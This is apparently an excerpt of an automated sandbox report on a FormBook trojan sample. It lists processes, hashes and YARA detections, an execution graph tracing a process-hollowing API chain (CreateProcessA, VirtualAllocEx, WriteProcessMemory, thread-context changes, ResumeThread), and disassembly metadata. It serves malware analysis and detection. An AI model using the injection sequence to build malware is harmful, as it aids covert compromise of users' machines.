                    Imagebase:0xea0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:13
                    Start time:11:52:18
                    Start date:03/07/2024
                    Path:C:\Windows\SysWOW64\shutdown.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\shutdown.exe"
                    Imagebase:0xb00000
                    File size:23'552 bytes
                    MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:14
                    Start time:11:52:31
                    Start date:03/07/2024
                    Path:C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe"
                    Imagebase:0xea0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:16
                    Start time:11:52:52
                    Start date:03/07/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff73feb0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:10.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:303
                      Total number of Limit Nodes:9
                      execution_graph 41798 2cd287c 41799 2cd2753 41798->41799 41800 2cd2946 41799->41800 41803 2cd3b79 41799->41803 41808 2cd3b88 41799->41808 41804 2cd3ba2 41803->41804 41813 2cd3ea0 41804->41813 41829 2cd3eb0 41804->41829 41805 2cd3bc6 41805->41800 41809 2cd3ba2 41808->41809 41811 2cd3ea0 12 API calls 41809->41811 41812 2cd3eb0 12 API calls 41809->41812 41810 2cd3bc6 41810->41800 41811->41810 41812->41810 41814 2cd3ec5 41813->41814 41845 2cd41d5 41814->41845 41854 2cd42d5 41814->41854 41859 2cd4079 41814->41859 41864 2cd445f 41814->41864 41868 2cd425f 41814->41868 41877 2cd487d 41814->41877 41881 2cd40a2 41814->41881 41886 2cd4166 41814->41886 41891 2cd3fad 41814->41891 41895 2cd44d3 41814->41895 41899 2cd44b1 41814->41899 41904 2cd4836 41814->41904 41908 2cd4035 41814->41908 41815 2cd3ed7 41815->41805 41830 2cd3ec5 41829->41830 41832 2cd3fad 2 API calls 41830->41832 41833 2cd4166 2 API calls 41830->41833 41834 2cd40a2 2 API calls 41830->41834 41835 2cd487d 2 API calls 41830->41835 41836 2cd425f 4 API calls 41830->41836 41837 2cd445f 2 API calls 41830->41837 41838 2cd4079 2 API calls 41830->41838 41839 2cd42d5 2 API calls 41830->41839 41840 2cd41d5 4 API calls 41830->41840 41841 2cd4035 2 API calls 41830->41841 41842 2cd4836 2 API calls 41830->41842 41843 2cd44b1 2 API calls 41830->41843 41844 2cd44d3 2 API calls 41830->41844 41831 2cd3ed7 41831->41805 41832->41831 41833->41831 41834->41831 41835->41831 41836->41831 41837->41831 41838->41831 41839->41831 41840->41831 41841->41831 41842->41831 41843->41831 41844->41831 41846 2cd41f1 41845->41846 41920 2cd1fd8 41846->41920 41924 2cd1fd0 41846->41924 41847 2cd40b9 41848 2cd46fb 41847->41848 41912 2cd2098 41847->41912 41916 2cd2090 41847->41916 41848->41815 41849 2cd40da 41855 2cd42db 41854->41855 41929 2cd1a18 41855->41929 41933 2cd1a10 41855->41933 41860 2cd409c 41859->41860 41862 2cd2098 WriteProcessMemory 41860->41862 41863 2cd2090 WriteProcessMemory 41860->41863 41861 2cd48ae 41862->41861 41863->41861 41865 2cd4465 41864->41865 41937 2cd4c7f 41865->41937 41942 2cd4c90 41865->41942 41869 2cd41f1 41868->41869 41873 2cd1fd8 VirtualAllocEx 41869->41873 41874 2cd1fd0 VirtualAllocEx 41869->41874 41870 2cd40b9 41871 2cd46fb 41870->41871 41875 2cd2098 WriteProcessMemory 41870->41875 41876 2cd2090 WriteProcessMemory 41870->41876 41871->41815 41872 2cd40da 41873->41870 41874->41870 41875->41872 41876->41872 41878 2cd4835 41877->41878 41878->41877 41879 2cd1ac8 Wow64SetThreadContext 41878->41879 41880 2cd1ac0 Wow64SetThreadContext 41878->41880 41879->41878 41880->41878 41882 2cd40a8 41881->41882 41884 2cd2098 WriteProcessMemory 41882->41884 41885 2cd2090 WriteProcessMemory 41882->41885 41883 2cd40da 41884->41883 41885->41883 41887 2cd416f 41886->41887 41889 2cd2098 WriteProcessMemory 41887->41889 41890 2cd2090 WriteProcessMemory 41887->41890 41888 2cd4020 41888->41815 41889->41888 41890->41888 41955 2cd2315 41891->41955 41960 2cd2320 41891->41960 41896 2cd4465 41895->41896 41896->41895 41897 2cd4c7f 2 API calls 41896->41897 41898 2cd4c90 2 API calls 41896->41898 41897->41896 41898->41896 41900 2cd44be 41899->41900 41902 2cd1a18 ResumeThread 41900->41902 41903 2cd1a10 ResumeThread 41900->41903 41901 2cd4020 41901->41815 41902->41901 41903->41901 41906 2cd1ac8 Wow64SetThreadContext 41904->41906 41907 2cd1ac0 Wow64SetThreadContext 41904->41907 41905 2cd4835 41905->41904 41906->41905 41907->41905 41964 2cd2188 41908->41964 41968 2cd2181 41908->41968 41909 2cd4020 41909->41815 41913 2cd20e0 WriteProcessMemory 41912->41913 41915 2cd2137 41913->41915 41915->41849 41917 2cd20e0 WriteProcessMemory 41916->41917 41919 2cd2137 41917->41919 41919->41849 41921 2cd2018 VirtualAllocEx 41920->41921 41923 2cd2055 41921->41923 41923->41847 41925 2cd1fd7 VirtualAllocEx 41924->41925 41927 2cd1fa2 41924->41927 41928 2cd2055 41925->41928 41927->41847 41928->41847 41930 2cd1a58 ResumeThread 41929->41930 41932 2cd1a89 41930->41932 41934 2cd1a58 ResumeThread 41933->41934 41936 2cd1a89 41934->41936 41938 2cd4ca5 41937->41938 41947 2cd1ac8 41938->41947 41951 2cd1ac0 41938->41951 41939 2cd4cbb 41939->41865 41943 2cd4ca5 41942->41943 41945 2cd1ac8 Wow64SetThreadContext 41943->41945 41946 2cd1ac0 Wow64SetThreadContext 41943->41946 41944 2cd4cbb 41944->41865 41945->41944 41946->41944 41948 2cd1b0d Wow64SetThreadContext 41947->41948 41950 2cd1b55 41948->41950 41950->41939 41952 2cd1a92 41951->41952 41952->41951 41953 2cd1b2d Wow64SetThreadContext 41952->41953 41954 2cd1b55 41953->41954 41954->41939 41956 2cd22ea 41955->41956 41957 2cd231f CreateProcessA 41955->41957 41956->41815 41959 2cd256b 41957->41959 41961 2cd23a9 CreateProcessA 41960->41961 41963 2cd256b 41961->41963 41965 2cd21d3 ReadProcessMemory 41964->41965 41967 2cd2217 41965->41967 41967->41909 41969 2cd2187 ReadProcessMemory 41968->41969 41970 2cd2152 41968->41970 41972 2cd2217 41969->41972 41970->41909 41972->41909 41622 105ff40 41625 1055cec 41622->41625 41624 105ff6e 41627 1055cf7 41625->41627 41626 1058609 41626->41624 41627->41626 41630 105cd60 41627->41630 41635 105cd70 41627->41635 41631 105cd65 41630->41631 41632 105cdb5 41631->41632 41640 105cf10 41631->41640 41644 105cf20 41631->41644 41632->41626 41636 105cd91 41635->41636 41637 105cdb5 41636->41637 41638 105cf10 2 API calls 41636->41638 41639 105cf20 2 API calls 41636->41639 41637->41626 41638->41637 41639->41637 41641 105cf20 41640->41641 41642 105cf67 41641->41642 41648 105b780 41641->41648 41642->41632 41645 105cf2d 41644->41645 41646 105cf67 41645->41646 41647 105b780 2 API calls 41645->41647 41646->41632 41647->41646 41649 105b78b 41648->41649 41651 105dc78 41649->41651 41652 105d084 41649->41652 41651->41651 41653 105d08f 41652->41653 41654 1055cec 2 API calls 41653->41654 41655 105dce7 41654->41655 41659 105fa68 41655->41659 41664 105fa50 41655->41664 41656 105dd21 41656->41651 41660 105fa99 41659->41660 41661 105faa5 41659->41661 41660->41661 41669 53609b2 41660->41669 41674 53609c0 41660->41674 41661->41656 41665 105fa68 41664->41665 41666 105faa5 41665->41666 41667 53609b2 2 API calls 41665->41667 41668 53609c0 2 API calls 41665->41668 41666->41656 41667->41666 41668->41666 41670 53609c0 41669->41670 41671 5360a9a 41670->41671 41679 53618a0 41670->41679 41683 5361890 41670->41683 41675 53609eb 41674->41675 41676 5360a9a 41675->41676 41677 53618a0 2 API calls 41675->41677 41678 5361890 2 API calls 41675->41678 41677->41676 41678->41676 41688 53618e5 41679->41688 41692 53618f0 41679->41692 41684 536187e 41683->41684 41684->41683 41686 53618e5 CreateWindowExW 41684->41686 41687 53618f0 CreateWindowExW 41684->41687 41685 53618d5 41685->41671 41686->41685 41687->41685 41689 5361958 CreateWindowExW 41688->41689 41691 5361a14 41689->41691 41693 5361958 CreateWindowExW 41692->41693 41695 5361a14 41693->41695 41695->41695 41973 105acb0 41974 105acbf 41973->41974 41977 105ad97 41973->41977 41985 105ada8 41973->41985 41978 105adb9 41977->41978 41979 105addc 41977->41979 41978->41979 41993 105b040 41978->41993 41997 105b031 41978->41997 41979->41974 41980 105afe0 GetModuleHandleW 41982 105b00d 41980->41982 41981 105add4 41981->41979 41981->41980 41982->41974 41986 105adb9 41985->41986 41987 105addc 41985->41987 41986->41987 41991 105b031 LoadLibraryExW 41986->41991 41992 105b040 LoadLibraryExW 41986->41992 41987->41974 41988 105afe0 GetModuleHandleW 41990 105b00d 41988->41990 41989 105add4 41989->41987 41989->41988 41990->41974 41991->41989 41992->41989 41994 105b054 41993->41994 41996 105b079 41994->41996 42001 105a168 41994->42001 41996->41981 41999 105b054 41997->41999 41998 105b079 41998->41981 41999->41998 42000 105a168 LoadLibraryExW 41999->42000 42000->41998 42002 105b220 LoadLibraryExW 42001->42002 42004 105b299 42002->42004 42004->41996 41696 100d01c 41697 100d034 41696->41697 41698 100d08e 41697->41698 41703 5362818 41697->41703 41708 5361a98 41697->41708 41713 5361aa8 41697->41713 41718 5362808 41697->41718 41705 5362845 41703->41705 41704 5362877 41705->41704 41723 5362da8 41705->41723 41728 5362d88 41705->41728 41709 5361aa8 41708->41709 41711 5362818 2 API calls 41709->41711 41712 5362808 2 API calls 41709->41712 41710 5361aef 41710->41698 41711->41710 41712->41710 41714 5361ace 41713->41714 41716 5362818 2 API calls 41714->41716 41717 5362808 2 API calls 41714->41717 41715 5361aef 41715->41698 41716->41715 41717->41715 41719 5362818 41718->41719 41720 5362877 41719->41720 41721 5362da8 2 API calls 41719->41721 41722 5362d88 2 API calls 41719->41722 41721->41720 41722->41720 41725 5362dbc 41723->41725 41724 5362e48 41724->41704 41733 5362e60 41725->41733 41736 5362e50 41725->41736 41730 5362dbc 41728->41730 41729 5362e48 41729->41704 41731 5362e60 2 API calls 41730->41731 41732 5362e50 2 API calls 41730->41732 41731->41729 41732->41729 41734 5362e71 41733->41734 41740 5364022 41733->41740 41734->41724 41737 5362e60 41736->41737 41738 5362e71 41737->41738 41739 5364022 2 API calls 41737->41739 41738->41724 41739->41738 41744 5364050 41740->41744 41748 5364040 41740->41748 41741 536403a 41741->41734 41745 5364092 41744->41745 41747 5364099 41744->41747 41746 53640ea CallWindowProcW 41745->41746 41745->41747 41746->41747 41747->41741 41749 5364050 41748->41749 41750 53640ea CallWindowProcW 41749->41750 41751 5364099 41749->41751 41750->41751 41751->41741 41752 2cd4da0 41753 2cd4f2b 41752->41753 41755 2cd4dc6 41752->41755 41755->41753 41756 2cd316c 41755->41756 41757 2cd5020 PostMessageW 41756->41757 41758 2cd508c 41757->41758 41758->41755 41759 1054668 41760 105467a 41759->41760 41761 1054686 41760->41761 41765 1054779 41760->41765 41770 1054218 41761->41770 41763 10546a5 41766 105479d 41765->41766 41774 1054878 41766->41774 41778 1054888 41766->41778 41771 1054223 41770->41771 41786 1055c6c 41771->41786 41773 1057048 41773->41763 41776 1054882 41774->41776 41775 105498c 41775->41775 41776->41775 41782 10544e0 41776->41782 41780 10548af 41778->41780 41779 105498c 41780->41779 41781 10544e0 CreateActCtxA 41780->41781 41781->41779 41783 1055918 CreateActCtxA 41782->41783 41785 10559db 41783->41785 41785->41785 41787 1055c77 41786->41787 41790 1055c8c 41787->41790 41789 10570ed 41789->41773 41791 1055c97 41790->41791 41794 1055cbc 41791->41794 41793 10571c2 41793->41789 41795 1055cc7 41794->41795 41796 1055cec 2 API calls 41795->41796 41797 10572c5 41796->41797 41797->41793 42005 105d438 42006 105d47e 42005->42006 42010 105d608 42006->42010 42013 105d618 42006->42013 42007 105d56b 42016 105b790 42010->42016 42014 105d646 42013->42014 42015 105b790 DuplicateHandle 42013->42015 42014->42007 42015->42014 42017 105d680 DuplicateHandle 42016->42017 42018 105d646 42017->42018 42018->42007

                      Executed Functions

                      Function 072F3D50 Relevance: 1.5, Strings: 1, Instructions: 280COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: !Y3E
                      • API String ID: 0-2826621527
                      • Opcode ID: 2177c1c1d63f02c9df15040a47d274e12a75e423588282eb77c03dd9b118527c
                      • Instruction ID: 8f2ab83eb7974e0bad519b12e169c252987f5e115141dae2cda9a38c359f1092
                      • Opcode Fuzzy Hash: 2177c1c1d63f02c9df15040a47d274e12a75e423588282eb77c03dd9b118527c
                      • Instruction Fuzzy Hash: 0FA18E74B20209CFDB44DBB5D95576EB6F2BF88700F218429E906EB3A5DE74DC018B40
                      Function 072F877B Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: T(z
                      • API String ID: 0-3184255237
                      • Opcode ID: 7ce36984d82ab9ccf82731a39123227570e42be9080a821550d673ed58499653
                      • Instruction ID: 4ac2fd4d72468cdb7ebaf0b88fb5ded376dccea8b6c61f128e834a29de5ecca1
                      • Opcode Fuzzy Hash: 7ce36984d82ab9ccf82731a39123227570e42be9080a821550d673ed58499653
                      • Instruction Fuzzy Hash: D94129B6F34208CBDB088AB589517AFF6B7EBC9600F10C436D602BB388CA708D418791
                      Function 072F8788 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: T(z
                      • API String ID: 0-3184255237
                      • Opcode ID: dd2c8eed18aaac1b32aa466e3da6e580d5bc0415d8255ccf648c9a5027613313
                      • Instruction ID: 5889d66baf1830b9f7beb4c760b0c6dbeefe03222ef369eaa777f829260a3957
                      • Opcode Fuzzy Hash: dd2c8eed18aaac1b32aa466e3da6e580d5bc0415d8255ccf648c9a5027613313
                      • Instruction Fuzzy Hash: 92312BB5F35209CBDB588AB589517AFF6B7EBC9600F10C43AD612BB388CA709D418791
                      Function 05367D58 Relevance: .6, Instructions: 592COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c380fd038b3c1e058765483e2e7b2f5f1c77b995cd22304305aee7e1e6af25c8
                      • Instruction ID: ca4376ec454bd915114a1842af0913a3916d3fbccac8630a6ae3a53608453787
                      • Opcode Fuzzy Hash: c380fd038b3c1e058765483e2e7b2f5f1c77b995cd22304305aee7e1e6af25c8
                      • Instruction Fuzzy Hash: 31525D34A00349CFCB14DF64C844BD9B7B2BF89314F2582A9D5596F3A2DB71A986CF81
                      Function 0536AEB0 Relevance: .6, Instructions: 575COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca7c1664a78224c359bcc89bb73980baad4054658137f017a630f2fac65917cd
                      • Instruction ID: f87bc4bdb6ab997a42e54535702137395358063b5958903b000f3c97f4a25329
                      • Opcode Fuzzy Hash: ca7c1664a78224c359bcc89bb73980baad4054658137f017a630f2fac65917cd
                      • Instruction Fuzzy Hash: 67525D34A00349CFDB14DF64C844BD9B7B2BF89314F2582A9D5586F3A2DB71A986CF81
                      Function 072F3CC8 Relevance: .3, Instructions: 344COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7862610738d8f1e00a47de84d45c049785d628afbfdbbd1e2fe22decd7beffc3
                      • Instruction ID: dbdf84a9f8ddf4fc0a560eaad7b1b0047458e5589e691bd64d00b758c0d34b78
                      • Opcode Fuzzy Hash: 7862610738d8f1e00a47de84d45c049785d628afbfdbbd1e2fe22decd7beffc3
                      • Instruction Fuzzy Hash: 7DC1D175B20205CFDB04DB78D8557AEBBF2BF89310F25846AE506EB3A1DA74DC418B90
                      Function 072F0F89 Relevance: .3, Instructions: 290COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db0702ce4bb0842cbbfa61e1c7a3d2ef9684a8bcbb640adf46a45f8274190fad
                      • Instruction ID: 8a7a0edac0bffa8686ef09378045e50190b84ef34d36425d48a52b96673b3a93
                      • Opcode Fuzzy Hash: db0702ce4bb0842cbbfa61e1c7a3d2ef9684a8bcbb640adf46a45f8274190fad
                      • Instruction Fuzzy Hash: 8DA157B2234159CFC7048B64D8905E9FBF5EB56320FA6587BDA02DF252D730DA55CB80
                      Function 072F3D42 Relevance: .3, Instructions: 276COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 53a6bf7e9f934b7b95c880a90884a7d159953581d4554fb7112947917f73f3e1
                      • Instruction ID: 1db78565dc82145d70211e55d00dd391ae9d8b494ccf3748e95d49e2bc074ec4
                      • Opcode Fuzzy Hash: 53a6bf7e9f934b7b95c880a90884a7d159953581d4554fb7112947917f73f3e1
                      • Instruction Fuzzy Hash: 45A19E74B20209CFDB44DBB5D95976EBAF2BF88700F258429E906EB3A5DE74DC418B40
                      Function 072F1060 Relevance: .2, Instructions: 174COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7a31c24a6993fbdb221f164053729eee932e05202223d718603ad922bb912f61
                      • Instruction ID: 629b944682c1cca10b14283975a1158131daacffc24755a9b1cf4db4ddc43e4d
                      • Opcode Fuzzy Hash: 7a31c24a6993fbdb221f164053729eee932e05202223d718603ad922bb912f61
                      • Instruction Fuzzy Hash: A161EFB123414DCFC708CF29C99082ABBBAEB96300BD2886BDA06DB355D770ED55CB45
                      Function 072F3EE3 Relevance: .2, Instructions: 159COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae80ec727241c0525bc71547af3845259617146ebf990827fd4487b947c3c4c8
                      • Instruction ID: 652dcf8c4dad58395adb2c31faefa57ba43425caee1f0abdbdd25ca7ca74b3c3
                      • Opcode Fuzzy Hash: ae80ec727241c0525bc71547af3845259617146ebf990827fd4487b947c3c4c8
                      • Instruction Fuzzy Hash: 9851C274B10209CFDB14DB74D85576EBAB3FF88300F209425EA06AB3A5CE79DC418B40
                      Function 072F7F18 Relevance: .1, Instructions: 117COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3db8ba4dffa2ae870b79c2dbbfc04175140edd5c10827c3ab3fb640474c446e8
                      • Instruction ID: 1efc6eeb7aa6aface1d1c68d25ab0512f8f3ecc1a8fa8f3e650aadd20492b739
                      • Opcode Fuzzy Hash: 3db8ba4dffa2ae870b79c2dbbfc04175140edd5c10827c3ab3fb640474c446e8
                      • Instruction Fuzzy Hash: 5D419671B34119DFCB14CFA8C9409AEFBB6EF89210FA0457AE606EB350D671DD418B81
                      Function 072F7F28 Relevance: .1, Instructions: 113COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ce2da333abfe1c2d3815a704d8b8857a6a9485fdf2e85a2a1a4569cfff74cee
                      • Instruction ID: 29ba769a45aaf01c272b439954900c9f775a4afd9beafc86aef46de49ac1bf54
                      • Opcode Fuzzy Hash: 2ce2da333abfe1c2d3815a704d8b8857a6a9485fdf2e85a2a1a4569cfff74cee
                      • Instruction Fuzzy Hash: 7D41A775B34119DBCB14CFA8C9408AEFBB6EF89310FA0457AE60AEB350D671DD418781
                      Function 02CD2315 Relevance: 1.8, APIs: 1, Instructions: 260processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 512 2cd2315-2cd231d 513 2cd231f-2cd23b5 512->513 514 2cd22ea-2cd2308 512->514 517 2cd23ee-2cd240e 513->517 518 2cd23b7-2cd23c1 513->518 526 2cd2447-2cd2476 517->526 527 2cd2410-2cd241a 517->527 518->517 520 2cd23c3-2cd23c5 518->520 521 2cd23e8-2cd23eb 520->521 522 2cd23c7-2cd23d1 520->522 521->517 524 2cd23d5-2cd23e4 522->524 525 2cd23d3 522->525 524->524 529 2cd23e6 524->529 525->524 535 2cd24af-2cd2569 CreateProcessA 526->535 536 2cd2478-2cd2482 526->536 527->526 528 2cd241c-2cd241e 527->528 530 2cd2441-2cd2444 528->530 531 2cd2420-2cd242a 528->531 529->521 530->526 533 2cd242c 531->533 534 2cd242e-2cd243d 531->534 533->534 534->534 537 2cd243f 534->537 547 2cd256b-2cd2571 535->547 548 2cd2572-2cd25f8 535->548 536->535 538 2cd2484-2cd2486 536->538 537->530 540 2cd24a9-2cd24ac 538->540 541 2cd2488-2cd2492 538->541 540->535 542 2cd2494 541->542 543 2cd2496-2cd24a5 541->543 542->543 543->543 545 2cd24a7 543->545 545->540 547->548 558 2cd2608-2cd260c 548->558 559 2cd25fa-2cd25fe 548->559 561 2cd261c-2cd2620 558->561 562 2cd260e-2cd2612 558->562 559->558 560 2cd2600 559->560 560->558 563 2cd2630-2cd2634 561->563 564 2cd2622-2cd2626 561->564 562->561 565 2cd2614 562->565 567 2cd2646-2cd264d 563->567 568 2cd2636-2cd263c 563->568 564->563 566 2cd2628 564->566 565->561 566->563 569 2cd264f-2cd265e 567->569 570 2cd2664 567->570 568->567 569->570 572 2cd2665 570->572 572->572
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02CD2556
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: a34cd64e9e96cb035ee1c9974ece96df502f1fc71db004cc75f564f8139c712e
                      • Instruction ID: d602c129cd05f796ff65bf4707ca15d83a8e59fa3de380a0c675286dcde70868
                      • Opcode Fuzzy Hash: a34cd64e9e96cb035ee1c9974ece96df502f1fc71db004cc75f564f8139c712e
                      • Instruction Fuzzy Hash: 32A14A71D00319CFEB20CF68C8407EEBBB2AF84314F148569DD59A7241DB749A85CF92
                      Function 02CD2320 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
